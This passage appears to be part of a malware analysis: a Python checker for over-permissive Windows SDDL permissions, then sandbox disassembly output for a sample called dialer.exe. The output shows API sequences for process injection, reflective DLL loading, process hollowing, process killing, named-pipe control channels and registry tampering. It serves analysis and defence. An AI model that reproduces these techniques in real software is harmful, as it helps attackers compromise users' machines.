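    """'A;OICI;GA;;;AU' -> dict with raw codes and decoded names."""
    fields = body.split(";")
    if len(fields) < 6:
        raise ValueError(f"malformed ACE: ({body})")
    ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields[:6]
    # A hex mask such as 0x1f01ff is kept as one opaque token (not decoded here).
    right_codes = [rights] if rights.startswith("0x") else pairs(rights)
    return {"type": ace_type, "flags": pairs(flags), "rights": right_codes, "sid": sid,
            "principal": SID_ALIASES.get(sid, sid),
            "flag_names": [ACE_FLAGS.get(f, f) for f in pairs(flags)],
            "right_names": [RIGHTS.get(r, r) for r in right_codes]}


def parse_dacl(sddl):
    """All ACEs of the D: section, in order (leading flags such as P or AI are ignored)."""
    return [parse_ace(b) for b in re.findall(r"\(([^)]*)\)", sddl_sections(sddl).get("D", ""))]


def overly_permissive(sddl):
    """Allow-ACEs that hand a write-capable right to a broad group."""
    return [ace for ace in parse_dacl(sddl)
            if ace["type"] == "A" and ace["sid"] in BROAD and set(ace["rights"]) & WRITE_LIKE]


if __name__ == "__main__":
    report_sddl = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"  # the string shown in the report
    for ace in parse_dacl(report_sddl):
        print(ace["type"], ace["principal"], ace["flag_names"], ace["right_names"])
    print("over-permissive:", [a["principal"] for a in overly_permissive(report_sddl)])
```

The same check applies to any descriptor recovered from a sample or from a live key or pipe: an allow entry for AU, BU, WD or IU carrying GA, GW, FA, KA or KW is the one to look at first, because it lets an unprivileged local account tamper with whatever object the descriptor protects.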

                        Control-flow Graph

control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                        • API String ID: 2561231171-3753927220
                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                        • String ID:
                        • API String ID: 4084875642-0
                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                        • String ID:
                        • API String ID: 3197395349-0
                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                        • String ID: .text$C:\Windows\System32\
                        • API String ID: 2721474350-832442975
                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                        • String ID: M$\\.\pipe\dialerchildproc64
                        • API String ID: 2203880229-3489460547
                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                        Control-flow Graph

                        control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 2071455217-3440882674
                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                        Control-flow Graph

                        control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                        • String ID:
                        • API String ID: 3676546796-0
                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                        Control-flow Graph

                        APIs
                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                        • OpenProcess.KERNEL32 ref: 0000000140001859
                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                        • CloseHandle.KERNEL32 ref: 0000000140001875
                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                        • String ID:
                        • API String ID: 1323846700-0
                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                        Control-flow Graph

                        control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandleOpenWow64
                        • String ID:
                        • API String ID: 10462204-0
                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                        Control-flow Graph

                        control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                        APIs
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                        • ExitProcess.KERNEL32 ref: 0000000140002263
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                        • String ID:
                        • API String ID: 3836936051-0
                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                        Control-flow Graph

                        control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                        • String ID: SOFTWARE$dialerstager$open
                        • API String ID: 3276259517-3931493855
                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                        Control-flow Graph

                        control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                        • String ID: @
                        • API String ID: 3462610200-2766056989
                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                        • String ID: dialersvc64
                        • API String ID: 4184240511-3881820561
                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Delete$CloseEnumOpen
                        • String ID: SOFTWARE\dialerconfig
                        • API String ID: 3013565938-461861421
                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
